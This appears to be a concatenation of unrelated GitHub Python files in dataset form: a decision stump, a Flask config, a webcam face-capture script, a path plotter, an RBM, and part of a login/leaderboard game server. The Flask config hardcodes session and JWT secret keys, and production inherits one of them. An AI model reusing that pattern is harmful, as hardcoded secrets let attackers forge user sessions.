bestThres = 0\n\n for i in range(len(sortCol)):\n s1, s2 = [], []\n for j in range(len(mtrx)):\n if(mtrx[j][feature] >= sortCol[i]): # True\n s1.append(mtrx[j])\n else: # False\n s2.append(mtrx[j])\n pH1 = pH(np.array(s1), len(mtrx) )\n pH2 = pH(np.array(s2), len(mtrx) )\n\n iG = h - ( pH1 + pH2 )\n if iG > bestGain:\n bestThres = sortCol[i]\n bestGain = iG\n\n return bestGain, bestThres\n\n\ndef testE(mtrxTEST, feat, thres, ltLBL, rtLBL):\n s1, s2 = [], []\n\n for j in range(len(mtrxTEST)):\n if(mtrxTEST[j][feat] >= thres): # True\n s1.append(mtrxTEST[j])\n\n else: # False\n s2.append(mtrxTEST[j])\n\n pos1 = np.count_nonzero( np.array(s1)[:, -1] == ltLBL)\n pos2 = np.count_nonzero( np.array(s2)[:, -1] == rtLBL)\n\n print( \"Testing Error %: \", (1 - ((pos1+pos2)/284))*100 )\n\n\ndef trainE(mtrx, feat, thres):\n s1, s2 = [], []\n\n for j in range(len(mtrx)):\n if(mtrx[j][feat] >= thres): # True\n s1.append(mtrx[j])\n\n else: # False\n s2.append(mtrx[j])\n\n maj1 = Counter(np.array(s1)[:, -1]).most_common(1)[0][0]\n maj2 = Counter(np.array(s2)[:, -1]).most_common(1)[0][0]\n\n pos1 = np.count_nonzero( np.array(s1)[:, -1] == maj1)\n pos2 = np.count_nonzero( np.array(s2)[:, -1] == maj2)\n\n tE = (1 - ((pos1+pos2)/284))*100\n\n return maj1, maj2, tE\n\n\ndef dTree(xTrain):\n gain = 0\n thres = 0\n feat = None\n\n for j in range(len(xTrain[0,:]) - 1):\n g, t = iGain(xTrain, j)\n if(g > gain):\n gain = g\n thres = t\n feat = j\n lt, rt, tE = trainE(xTrain, feat, thres)\n\n return feat, thres, lt, rt, tE, gain\n\n########################## MAIN ###############################\nif(len(sys.argv) < 3):\n print(\"Must include filenames as arguments\")\nelse:\n # trainDATA\n X = []\n f = open(sys.argv[1], 'r')\n f = csv.reader(f)\n for row in f:\n X.append(row[1:31]+row[0:1])\n Train = array(X).astype(np.float64)\n\n # testDATA\n X = []\n f = open(sys.argv[2], 'r')\n f = csv.reader(f)\n for row in f:\n X.append(row[1:31] + row[0:1])\n Test = array(X).astype(np.float64)\n ########################## TEST ###############################\n feat, thres, lt, rt, trainE, grain = dTree(Train)\n\n print(\"Decision Stump: \")\n print(\"Feature \", feat, \" split\")\n print(\"| Label \", lt, \" < \", thres)\n print(\"| Label \", rt, \" >= \", thres)\n\n print(\"\\n\\nSplitting on feature \", feat)\n print(\"With threshold value \", thres)\n print(\"Best information gain value \", grain)\n\n print(\"\\n\\nTraining Error %: \", trainE)\n testE(Test, feat, thres, lt, rt)\n","repo_name":"sanderau/CS434-ImplementationAssignmentOne","sub_path":"src/Hw2/q2_1.py","file_name":"q2_1.py","file_ext":"py","file_size_in_byte":3823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"40059043096","text":"import os\n# from dotenv import load_dotenv\n\n\nclass Config(object):\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n JWT_SECRET_KEY = \"duck\"\n SECRET_KEY = \"learning flask login\"\n \n\n #1mb for file size uploads\n MAX_CONTENT_LENGTH = 1 * 1024 * 1024\n\n\n @property\n def SQLALCHEMY_DATABASE_URI(self):\n value = os.environ.get(\"DB_URI\")\n\n if not value:\n raise ValueError(\"DB_URI is not set\")\n\n return value\n \n @property\n def AWS_ACCESS_KEY_ID(self):\n value = os.environ.get(\"AWS_ACCESS_KEY_ID\")\n\n if not value:\n raise ValueError(\"AWS_ACCESS_KEY_ID is not set\")\n\n return value\n \n @property\n def AWS_SECRET_ACCESS_KEY(self):\n value = os.environ.get(\"AWS_SECRET_ACCESS_KEY\")\n\n if not value:\n raise ValueError(\"AWS_SECRET_ACCESS_KEY is not set\")\n\n return value\n \n @property\n def AWS_S3_BUCKET(self):\n value = os.environ.get(\"AWS_S3_BUCKET\")\n\n if not value:\n raise ValueError(\"AWS_S3_BUCKET is not set\")\n\n return value\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n\nclass ProductionConfig(Config):\n @property\n def JWT_SECRET_KEY(self):\n value = os.environ.get(\"JWT_SECRET_KEY\")\n\n if not value:\n raise ValueError(\"JWT Secret Key is not set\")\n \n return value\n\nclass TestingConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = \"sqlite:///:memory:\"\n\nclass WorkflowConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = \"sqlite:///:memory:\"\n\nenvironment = os.environ.get(\"FLASK_ENV\")\n\nif environment == \"production\":\n app_config = ProductionConfig()\nelif environment == \"testing\":\n app_config = TestingConfig()\nelse:\n app_config = DevelopmentConfig()","repo_name":"Ctrain68/contract_marketplace","sub_path":"src/default_settings.py","file_name":"default_settings.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"13323073800","text":"import cv2\nimport dlib\nimport os\nimport random\n\noutput_dir = './face_photos/my_faces'\nsize = 64\n\nif not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n\ndef relight(img, light=1, bias=0):\n w = img.shape[1]\n h = img.shape[0]\n\n for i in range(0, w):\n for j in range(0, h):\n for l in range(3):\n tmp = int(img[j, i, l]*light + bias)\n if tmp > 255:\n tmp = 255\n elif tmp < 0:\n tmp = 0\n img[j, i, l] = tmp\n return img\n\n\ndetector = dlib.get_frontal_face_detector()\ncamera = cv2.VideoCapture(0)\n\nindex = 1\nwhile True:\n if index <= 10000:\n print('Being processed picture %s' % index)\n success, img = camera.read()\n gray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n dets = detector(gray_img, 1)\n\n for i, d in enumerate(dets):\n x1 = d.top() if d.top() > 0 else 0\n y1 = d.bottom() if d.bottom() > 0 else 0\n x2 = d.left() if d.left() > 0 else 0\n y2 = d.right() if d.right() > 0 else 0\n\n face = img[x1:y1, x2:y2]\n face = relight(face, random.uniform(0.5, 1.5), random.randint(-50, 50))\n\n face = cv2.resize(face, (size, size))\n\n cv2.imshow('image', face)\n\n cv2.imwrite(output_dir+'/'+str(index)+'.jpg', face)\n\n index += 1\n key = cv2.waitKey(30) & 0xff\n if key == 27:\n break\n else:\n print('Finished!')\n break\n","repo_name":"weichen283/FaceRecognition-pytorch","sub_path":"selfie.py","file_name":"selfie.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"12599590301","text":"from array import *\r\nimport matplotlib.pyplot as plt\r\nx_pos = 0\r\ny_pos = 0\r\nmag = 0.1\r\narr_x = array('f', [])\r\narr_y = array('f', [])\r\n\r\n\r\ndef velocity_vector(way_x, way_y):\r\n x = x_pos\r\n y = y_pos\r\n distance = (((x_pos - way_x) ** 2 + (y_pos - way_y) ** 2) ** 0.5)\r\n vector_x = (((way_x - x_pos) / distance) * 0.1)\r\n vector_y = (((way_y - y_pos) / distance) * 0.1)\r\n while (vector_x < way_x) and (vector_y < way_y):\r\n x = x + vector_x\r\n y = y + vector_y\r\n\r\n if x >= way_x and y >= way_y:\r\n print(str(way_x) + \"i + \" + str(way_y) + \"j\")\r\n break\r\n else:\r\n print(str(x) + \"i + \" + str(y) + \"j\")\r\n arr_x.append(x)\r\n arr_y.append(y)\r\n\r\n\r\nfor j in range(0, 5):\r\n waypoint = input()\r\n msg = waypoint.split()\r\n way_x = float(msg[0])\r\n way_y = float(msg[1])\r\n velocity_vector(way_x, way_y)\r\n arr_x.append(way_x)\r\n arr_y.append(way_y)\r\n x_pos = arr_x[-1]\r\n y_pos = arr_y[-1]\r\nplt.plot(arr_x, arr_y, linewidth=2.0)\r\nplt.show()\r\n","repo_name":"Bhargavi2211/ros2","sub_path":"path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"70267245309","text":"\nimport epyk as pk\n\n\npage = pk.Page()\npage.headers.dev() # Change the Epyk logo\n\ndataPoints = [\n {'x': 0, 'y': 10, 'y1': 10},\n {'x': 1, 'y': 35, 'y1': 20},\n {'x': 2, 'y': 25, 'y1': 10},\n {'x': 3, 'y': 30, 'y1': 5},\n {'x': 4, 'y': 28, 'y1': 10}]\n\ndataPoints2 = [\n {'label': \"mango\", 'x': 0, 'y': 30, 'y1': 10},\n {'label': \"grape\", 'x': 1, 'y': 28, 'y1': 5}\n]\n\npage.ui.input(\"Test\")\n\n#js_data_object = page.data.js.record(data=dataPoints2)\n\nc = page.ui.charts.c3.line(dataPoints2, y_columns=[\"y\", 'y1'], x_axis='x') #dataPoints, y_columns=[\"y\", 'y1'], x_axis='x')\n\n\n#\n# page.ui.button(\"reset\").click([\n# c.build(dataPoints2),\n# #c.js.render(),\n# ])\n# #\n# c.click([\n# page.js.console.log(c.js.content),\n# ])\n#\n# dataPoints3 = [\n# {'label': \"mango\", 'x': 0, 'y': 20, 'y1': 20, 'r': 10},\n# {'label': \"grape\", 'x': 1, 'y': 18, 'y2': 20, 'r': 5}\n# ]\n#\n# page.ui.button(\"add\").click([\n# c.js.load(['test', 1, 15, 26, 89]),\n# #c.js.render(),\n# ])\n#\n# page.ui.button(\"remove\").click([\n# c.js.unload(['test']),\n# #c.js.render(),\n# ])\n#\n#\n# page.ui.button(\"reset\").click([\n# c.build(dataPoints3),\n# #c.js.render(),\n# ])\n\n","repo_name":"epykure/epyk-templates","sub_path":"locals/charts/c3_single.py","file_name":"c3_single.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"6"} +{"seq_id":"72966586427","text":"from tqdm import tqdm\n\nfrom demo.lab4.util import *\nfrom utils.util import ensure_dir, plot_metric\n\nplt.style.use('seaborn-white')\n\n\nclass RestrictedBoltzmannMachine():\n '''\n For more details : A Practical Guide to Training Restricted Boltzmann Machines https://www.cs.toronto.edu/~hinton/absps/guideTR.pdf\n '''\n\n def __init__(self, ndim_visible, ndim_hidden, is_bottom=False, image_size=(28, 28), is_top=False, n_labels=10,\n batch_size=10, visuals_save_path=\"\", weight_decay=0.0001, learning_rate=0.01, momentum=0.7):\n\n \"\"\"\n Args:\n ndim_visible: Number of units in visible layer.\n ndim_hidden: Number of units in hidden layer.\n is_bottom: True only if this rbm is at the bottom of the stack in a deep belief net. Used to interpret visible layer as image data with dimensions \"image_size\".\n image_size: Image dimension for visible layer.\n is_top: True only if this rbm is at the top of stack in deep beleif net. Used to interpret visible layer as concatenated with \"n_label\" unit of label data at the end. \n n_label: Number of label categories.\n batch_size: Size of mini-batch.\n visuals_save_path: the folder where the debug images should be saved\n \"\"\"\n\n self.ndim_visible = ndim_visible\n\n self.ndim_hidden = ndim_hidden\n\n self.is_bottom = is_bottom\n\n if is_bottom: self.image_size = image_size\n\n self.is_top = is_top\n\n if is_top: self.n_labels = n_labels\n\n self.batch_size = batch_size\n\n self.delta_bias_v = 0\n\n self.delta_weight_vh = 0\n\n self.delta_bias_h = 0\n\n self.bias_v = np.random.normal(loc=0.0, scale=0.01, size=(self.ndim_visible))\n\n self.weight_vh = np.random.normal(loc=0.0, scale=0.01, size=(self.ndim_visible, self.ndim_hidden))\n\n self.bias_h = np.random.normal(loc=0.0, scale=0.01, size=(self.ndim_hidden))\n\n self.delta_weight_v_to_h = 0\n\n self.delta_weight_h_to_v = 0\n\n self.weight_v_to_h = None\n\n self.weight_h_to_v = None\n\n self.learning_rate = learning_rate\n\n self.momentum = momentum\n\n self.weight_decay = weight_decay\n\n self.print_period = 5000\n\n ensure_dir(visuals_save_path)\n self.rf = { # receptive-fields. Only applicable when visible layer is input data\n \"period\": 5000, # iteration period to visualize\n \"grid\": [5, 5], # size of the grid\n \"ids\": np.random.randint(0, self.ndim_hidden, 25), # pick some random hidden units\n \"path\": visuals_save_path\n }\n\n return\n\n def viz_all_rf(self, name=\"rf\"):\n \"\"\"\n Visualize all receptive fields and save\n \"\"\"\n weights = self.weight_vh.reshape((self.image_size[0], self.image_size[1], -1))\n imax = abs(weights).max()\n for hw in range(weights.shape[2]):\n fig, axs = plt.subplots()\n plt.title(f\"RF {hw}\")\n axs.set_xticks([])\n axs.set_yticks([])\n axs.imshow(weights[:, :, hw], cmap=\"bwr\", vmin=-imax, vmax=imax, interpolation=None)\n plt.savefig(os.path.join(self.rf[\"path\"], f\"{name}_{hw:04d}.png\"), dpi=200)\n plt.close('all')\n\n def viz_weights_histogram(self, name):\n fig, axs = plt.subplots(1, 3, figsize=(6.4 * 3, 4.8))\n fig.suptitle(f'Histogram plot of weights and biases, {name}')\n\n for ax in axs.flat:\n ax.set(xlabel='weight value', ylabel='count')\n\n kwargs = dict(histtype='stepfilled', alpha=0.3, density=True, bins=100)\n\n axs[0].set_title('weights vh')\n axs[0].hist(self.weight_vh.flatten(), label='weights', **kwargs)\n\n axs[1].set_title('bias v')\n axs[1].hist(self.bias_v.flatten(), **kwargs)\n\n axs[2].set_title('bias h')\n axs[2].hist(self.bias_h.flatten(), **kwargs)\n\n plt.savefig(os.path.join(self.rf[\"path\"], f\"weights_histogram_{name}.png\"), dpi=200)\n plt.close()\n\n def cd1(self, visible_trainset, n_iterations=10000):\n\n \"\"\"Contrastive Divergence with k=1 full alternating Gibbs sampling\n\n Args:\n visible_trainset: training data for this rbm, shape is (size of training set, size of visible layer)\n n_iterations: number of iterations of learning (each iteration learns a mini-batch)\n \"\"\"\n\n print(f\"learning CD1. visuals_save_path={self.rf['path']}\")\n\n logs = {}\n logs[\"recon_losses\"] = []\n logs[\"sum_of_weights_changes\"] = [[], [], [], \"w_vh, b_v, b_h\"]\n for it in tqdm(range(n_iterations)):\n mini_idx = it % (visible_trainset.shape[0] // self.batch_size)\n if mini_idx == 0:\n shuffle_indices = np.arange(visible_trainset.shape[0])\n np.random.shuffle(shuffle_indices)\n visible_trainset = visible_trainset[shuffle_indices]\n\n # mini_indices = np.random.choice(visible_trainset.shape[0], self.batch_size, replace=False)\n # pv_0 = v0 = visible_trainset[mini_indices]\n pv_0 = v0 = visible_trainset[self.batch_size * mini_idx:self.batch_size * (mini_idx + 1)]\n ph_0, h0 = self.get_h_given_v(v0)\n p_v1, _ = self.get_v_given_h(h0)\n p_h1, _ = self.get_h_given_v(p_v1)\n\n self.update_params(pv_0, ph_0, p_v1, p_h1)\n\n # visualize once in a while when visible layer is input images\n\n if it % self.rf[\"period\"] == 0 and self.is_bottom:\n viz_rf(weights=self.weight_vh[:, self.rf[\"ids\"]].reshape((self.image_size[0], self.image_size[1], -1)),\n it=it, grid=self.rf[\"grid\"], save_path=self.rf[\"path\"])\n\n # print progress\n\n if it % self.print_period == 0:\n _, hr = self.get_h_given_v(visible_trainset) # reconstruction loss\n _, vr = self.get_v_given_h(hr)\n recon_loss = np.linalg.norm(visible_trainset - vr) / visible_trainset.shape[0]\n\n logs[\"recon_losses\"].append(recon_loss)\n logs[\"sum_of_weights_changes\"][0].append(np.abs(self.delta_weight_vh).sum())\n logs[\"sum_of_weights_changes\"][1].append(np.abs(self.delta_bias_v).sum())\n logs[\"sum_of_weights_changes\"][2].append(np.abs(self.delta_bias_h).sum())\n print(logs)\n print(\"iteration=%7d recon_loss=%4.10f\" % (it, recon_loss))\n\n self.viz_weights_histogram(f\"{it:06d}\")\n\n with open(os.path.join(self.rf[\"path\"], f\"logs.txt\"), \"w\") as f:\n f.write(f\"{logs}\")\n plot_metric(logs[\"recon_losses\"], os.path.join(self.rf[\"path\"], f\"recon_loss\"), True)\n\n return logs\n\n def update_params(self, v_0, h_0, v_k, h_k):\n\n \"\"\"Update the weight and bias parameters.\n\n You could also add weight decay and momentum for weight updates.\n\n Args:\n v_0: activities or probabilities of visible layer (data to the rbm)\n h_0: activities or probabilities of hidden layer\n v_k: activities or probabilities of visible layer\n h_k: activities or probabilities of hidden layer\n all args have shape (size of mini-batch, size of respective layer)\n \"\"\"\n\n self.delta_bias_v = self.momentum * self.delta_bias_v + self.learning_rate * np.average(v_0 - v_k, axis=0)\n self.delta_weight_vh = self.learning_rate * ((v_0.T @ h_0 - v_k.T @ h_k) / v_0.shape[\n 0] - self.weight_decay * self.weight_vh) + self.momentum * self.delta_weight_vh\n # self.learning_rate * (np.average(v_0[:, :, np.newaxis] * h_0[:, np.newaxis, :], axis=0)\n # - np.average(v_k[:, :, np.newaxis] * h_k[:, np.newaxis, :], axis=0))\n self.delta_bias_h = self.momentum * self.delta_bias_h + self.learning_rate * np.average(h_0 - h_k, axis=0)\n\n self.bias_v += self.delta_bias_v\n self.weight_vh += self.delta_weight_vh\n self.bias_h += self.delta_bias_h\n\n return\n\n def get_h_given_v(self, visible_minibatch):\n\n \"\"\"Compute probabilities p(h|v) and activations h ~ p(h|v) \n\n Uses undirected weight \"weight_vh\" and bias \"bias_h\"\n \n Args: \n visible_minibatch: shape is (size of mini-batch, size of visible layer)\n Returns: \n tuple ( p(h|v) , h) \n both are shaped (size of mini-batch, size of hidden layer)\n \"\"\"\n return self._get_h_given_v(visible_minibatch, self.weight_vh)\n\n def get_v_given_h(self, hidden_minibatch):\n\n \"\"\"Compute probabilities p(v|h) and activations v ~ p(v|h)\n\n Uses undirected weight \"weight_vh\" and bias \"bias_v\"\n\n Args:\n hidden_minibatch: shape is (size of mini-batch, size of hidden layer)\n Returns:\n tuple ( p(v|h) , v)\n both are shaped (size of mini-batch, size of visible layer)\n \"\"\"\n return self._get_v_given_h(hidden_minibatch, self.weight_vh.T)\n\n def _get_h_given_v(self, visible_minibatch, weights):\n assert weights is not None\n\n total_input_for_each_unit = (visible_minibatch @ weights) + self.bias_h\n p_h_given_v = sigmoid(total_input_for_each_unit)\n h_sample = sample_binary(p_h_given_v)\n\n return p_h_given_v, h_sample\n\n def _get_v_given_h(self, hidden_minibatch, weights):\n assert weights is not None\n\n total_input_for_each_unit = (hidden_minibatch @ weights) + self.bias_v\n if self.is_top:\n\n \"\"\"\n Here visible layer has both data and labels. Compute total input for each unit (identical for both cases), \\ \n and split into two parts, something like support[:, :-self.n_labels] and support[:, -self.n_labels:]. \\\n Then, for both parts, use the appropriate activation function to get probabilities and a sampling method \\\n to get activities. The probabilities as well as activities can then be concatenated back into a normal visible layer.\n \"\"\"\n\n left_in, labels_in = total_input_for_each_unit[:, :-self.n_labels], total_input_for_each_unit[:,\n -self.n_labels:]\n left_p_v_given_h, labels_p_v_given_h = sigmoid(left_in), softmax(labels_in)\n left_v_sample, labels_v_sample = sample_binary(left_p_v_given_h), sample_categorical(labels_p_v_given_h)\n\n p_v_given_h = np.concatenate((left_p_v_given_h, labels_p_v_given_h), axis=1)\n v_sample = np.concatenate((left_v_sample, labels_v_sample), axis=1)\n\n else:\n\n p_v_given_h = sigmoid(total_input_for_each_unit)\n v_sample = sample_binary(p_v_given_h)\n\n return p_v_given_h, v_sample\n\n \"\"\" rbm as a belief layer : the functions below do not have to be changed until running a deep belief net \"\"\"\n\n def untwine_weights(self):\n\n self.weight_v_to_h = np.copy(self.weight_vh)\n self.weight_h_to_v = np.copy(np.transpose(self.weight_vh))\n self.weight_vh = None\n\n def get_h_given_v_dir(self, visible_minibatch):\n\n \"\"\"Compute probabilities p(h|v) and activations h ~ p(h|v)\n\n Uses directed weight \"weight_v_to_h\" and bias \"bias_h\"\n \n Args: \n visible_minibatch: shape is (size of mini-batch, size of visible layer)\n Returns: \n tuple ( p(h|v) , h) \n both are shaped (size of mini-batch, size of hidden layer)\n \"\"\"\n return self._get_h_given_v(visible_minibatch, self.weight_v_to_h)\n\n def get_v_given_h_dir(self, hidden_minibatch):\n\n \"\"\"Compute probabilities p(v|h) and activations v ~ p(v|h)\n\n Uses directed weight \"weight_h_to_v\" and bias \"bias_v\"\n \n Args: \n hidden_minibatch: shape is (size of mini-batch, size of hidden layer)\n Returns: \n tuple ( p(v|h) , v) \n both are shaped (size of mini-batch, size of visible layer)\n \"\"\"\n return self._get_v_given_h(hidden_minibatch, self.weight_h_to_v)\n\n def update_generate_params(self, inps, trgs, preds):\n\n \"\"\"Update generative weight \"weight_h_to_v\" and bias \"bias_v\"\n \n Args:\n inps: activities or probabilities of input unit\n trgs: activities or probabilities of output unit (target)\n preds: activities or probabilities of output unit (prediction)\n all args have shape (size of mini-batch, size of respective layer)\n \"\"\"\n\n # [TODO TASK 4.3] find the gradients from the arguments (replace the 0s below) and update the weight and bias parameters.\n\n self.delta_weight_h_to_v += 0\n self.delta_bias_v += 0\n\n self.weight_h_to_v += self.delta_weight_h_to_v\n self.bias_v += self.delta_bias_v\n\n return\n\n def update_recognize_params(self, inps, trgs, preds):\n\n \"\"\"Update recognition weight \"weight_v_to_h\" and bias \"bias_h\"\n\n Args:\n inps: activities or probabilities of input unit\n trgs: activities or probabilities of output unit (target)\n preds: activities or probabilities of output unit (prediction)\n all args have shape (size of mini-batch, size of respective layer)\n \"\"\"\n\n # [TODO TASK 4.3] find the gradients from the arguments (replace the 0s below) and update the weight and bias parameters.\n\n self.delta_weight_v_to_h += 0\n self.delta_bias_h += 0\n\n self.weight_v_to_h += self.delta_weight_v_to_h\n self.bias_h += self.delta_bias_h\n\n return\n","repo_name":"m43/kth-annda","sub_path":"demo/lab4/rbm.py","file_name":"rbm.py","file_ext":"py","file_size_in_byte":13561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"33957539317","text":"class Cat:\r\n def __init__(self, color, age, weight, name, gender):\r\n self.color = color\r\n self.age = age\r\n self.weight = weight\r\n self.name = name\r\n self.gender = gender\r\n def print_info(self):\r\n if self.gender == 'male':\r\n print(f'{self.name} is a {self.color} cat. He is {self.age} years old and weighs {self.weight} lbs.')\r\n else:\r\n print(f'{self.name} is a {self.color} cat. She is {self.age} years old and weighs {self.weight} lbs.')\r\n\r\nGibson = Cat('black-gray-white-orange', 12, 12, \"Gibson\", \"male\")\r\nKitten = Cat('orange-white',7,15,'Kitten', 'male')\r\nTele = Cat('gray-white-orange', 11, 11, 'Tele', 'female')\r\n\r\nGibson.print_info()\r\nTele.print_info()\r\nKitten.print_info()\r\n","repo_name":"interrobanger/Python-Practice","sub_path":"ClassyCat.py","file_name":"ClassyCat.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"13846157820","text":"import base64\nimport json\nimport time\n\nimport router\nimport config\nimport logger\nimport handlers\nimport auth\nimport datastore\nimport util\nimport achievements\nimport flags\nimport ratelimiter\nfrom headers import *\n\nimport wsgiserver\n\nrt = router.Router()\n\nTAG = \"Main\"\n\n@rt.route(\"^/\", [\"OPTIONS\"])\ndef appPreflightRequest(environ, start_response):\n start_response('200 OK', HEADERS_CORS)\n return []\n\n@rt.route(\"^/leaderboard\", [\"GET\"])\ndef appLeaderboard(environ, start_response):\n ratelimiter.test(environ['REMOTE_ADDR'], 4)\n with datastore.open_datastore(\"leaderboard\") as l:\n leaderboard = l.read()\n start_response(\n '200 OK',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_ok(leaderboard[0:30])\n \n@rt.route(\"^/fullleaderboard\", [\"GET\"])\ndef appLeaderboardFull(environ, start_response):\n ratelimiter.test(environ['REMOTE_ADDR'], 4)\n with datastore.open_datastore(\"leaderboard\") as l:\n leaderboard = l.read()\n start_response(\n '200 OK',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_ok(leaderboard)\n\n@rt.route(\"^/profile\", [\"GET\"])\ndef appProfile(environ, start_response):\n ratelimiter.test(environ['REMOTE_ADDR'], 4)\n uid = int(environ['PATH_INFO'].split('/')[-1])\n with datastore.open_user_datastore(uid) as d:\n user_datastore = d.read()\n start_response(\n '200 OK',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n adm_info = None\n if auth.validate(1, environ.get('HTTP_X_FOOLSSESSIONTOKEN', '')):\n html = \"
%1

\"\n html += \"
\"\n flag_list = [i for i in dir(flags) if i.startswith(\"FLAG_\")]\n flag_list.sort(key=lambda x: eval(\"flags.%s\" % x))\n for flag in flag_list:\n if util.checkflag(user_datastore['state'], eval(\"flags.%s\" % flag)):\n html += \"%s = True
\" % flag\n else:\n html += \"%s = False
\" % flag\n html += \"
\"\n adm_info = [html, json.dumps(user_datastore)]\n return util.json_ok({\n \"username\": user_datastore['username'],\n \"score\": user_datastore['score'],\n \"achievements\": user_datastore['achievements'],\n \"lottery\": user_datastore['lottery'],\n \"admin\": adm_info,\n \"title\": user_datastore['title'],\n \"visited\": len(user_datastore['visited_maps'])\n })\n\n@rt.route(\"^/ping\", [\"GET\"])\ndef appPing(environ, start_response):\n ratelimiter.test(environ['REMOTE_ADDR'], 4)\n token = environ.get('HTTP_X_FOOLSSESSIONTOKEN', '')\n if not auth.validate(-1, token):\n start_response(\n '200 OK',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_ok({\n \"logged_in\": False,\n \"uid\": 0\n })\n uid = auth.token_uid(token)\n with datastore.open_user_datastore(uid) as d:\n user_datastore = d.read()\n start_response(\n '200 OK',\n construct_headers(HEADERS_JSON, HEADERS_CORS, [\n (\"X-FoolsRefreshToken\", auth.create(uid))\n ])\n )\n obj = {\n \"logged_in\": True,\n \"uid\": uid,\n \"username\": user_datastore['username'],\n \"score\": user_datastore['score'],\n \"wholesome\": user_datastore['wholesome'],\n \"achievements\": user_datastore['achievements'],\n \"titles\": user_datastore['titles'],\n \"lottery\": user_datastore['lottery'],\n \"message\": user_datastore['message'],\n \"title\": user_datastore['title']\n }\n return util.json_ok(obj)\n\n@rt.route(\"^/register\", [\"POST\"])\ndef appRegister(environ, start_response):\n ratelimiter.test(environ['REMOTE_ADDR'], 1)\n data_len = int(environ.get('CONTENT_LENGTH', 0))\n creds = json.loads(environ['wsgi.input'].read(data_len))\n \n creds['u'] = creds['u'].strip()\n\n try: \n attempt_gen3_charset = util.utf8_to_gen3(creds['u'])\n if len(creds['u']) >= 16:\n raise RuntimeError(\"nope\")\n if len(creds['u']) < 1:\n raise RuntimeError(\"nope\")\n except:\n start_response(\n '422 Unprocessable Entity',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_error(3, \"Invalid username. Username must contain at least 1 character, at most 15 characters, and only contain characters from the Gen III latin set.\")\n \n if len(creds['p1']) < 6:\n start_response(\n '422 Unprocessable Entity',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_error(4, \"Password must be at least 6 characters.\")\n\n if creds['p1'] != creds['p2']:\n start_response(\n '422 Unprocessable Entity',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_error(7, \"Passwords do not match.\")\n\n if len(creds['m']) > 150:\n start_response(\n '422 Unprocessable Entity',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_error(5, \"Your message is too long.\")\n\n with datastore.open_global_datastore() as d:\n global_datastore = d.read()\n if 'uid_map' not in global_datastore:\n global_datastore['uid_map'] = {}\n\n if creds['u'] in global_datastore['uid_map']:\n start_response(\n '422 Unprocessable Entity',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_error(6, \"This username already exists. Choose a different username.\")\n\n uid = 1\n while uid in global_datastore['uid_map'].values():\n uid = util.rand(100, 9999999)\n\n global_datastore['uid_map'][creds['u']] = uid\n d.write(global_datastore)\n \n logger.log(TAG, \"registering user id %i\" % uid)\n\n udata = {\n \"username\": creds['u'],\n \"password\": auth.pw_hash(creds['p1']),\n \"uid\": uid,\n \"fun\": util.rand(0, 256),\n \"special_flags\": [],\n \"state\": [0]*32,\n \"score\": -1,\n \"wholesome\": 0,\n \"achievements\": [],\n \"titles\": [],\n \"lottery\": 0,\n \"message\": creds['m'],\n \"update\": 0,\n \"title\": \"New Adventurer\",\n \"visited_maps\": {},\n \"yeet\": {'id': 0, 'index': 0, 'start': 0},\n \"ip\": environ['REMOTE_ADDR']\n }\n achievements.check_player_completion(udata)\n with datastore.open_user_datastore(uid) as d:\n d.write(udata)\n\n start_response(\n '200 OK',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_ok({\n \"username\": creds['u'],\n \"uid\": uid,\n \"session\": auth.create(uid),\n \"scope\": \"fools2022\"\n })\n\n@rt.route(\"^/login\", [\"POST\"])\ndef appLogin(environ, start_response):\n ratelimiter.test(environ['REMOTE_ADDR'], 1)\n data_len = int(environ.get('CONTENT_LENGTH', 0))\n creds = json.loads(environ['wsgi.input'].read(data_len))\n\n with datastore.open_global_datastore() as d:\n global_datastore = d.read()\n \n if creds['u'] not in global_datastore['uid_map']:\n start_response(\n '401 Unauthorized',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_error(2, \"Incorrect username or password\")\n\n uid = global_datastore['uid_map'][creds['u']]\n\n with datastore.open_user_datastore(uid) as d:\n user_datastore = d.read()\n \n if not auth.pw_compare(creds['p'], user_datastore['password']):\n start_response(\n '401 Unauthorized',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_error(2, \"Incorrect username or password\")\n\n start_response(\n '200 OK',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_ok({\n \"session\": auth.create(uid),\n \"uid\": uid,\n \"scope\": \"fools2022\"\n })\n\n@rt.route(\"^/packet/[0-9]+/?$\", [\"POST\"])\ndef appRequest(environ, start_response):\n ratelimiter.test(environ['REMOTE_ADDR'], 1)\n # only allow authorized requests\n uid = int(environ['PATH_INFO'].split('/')[-1])\n token = 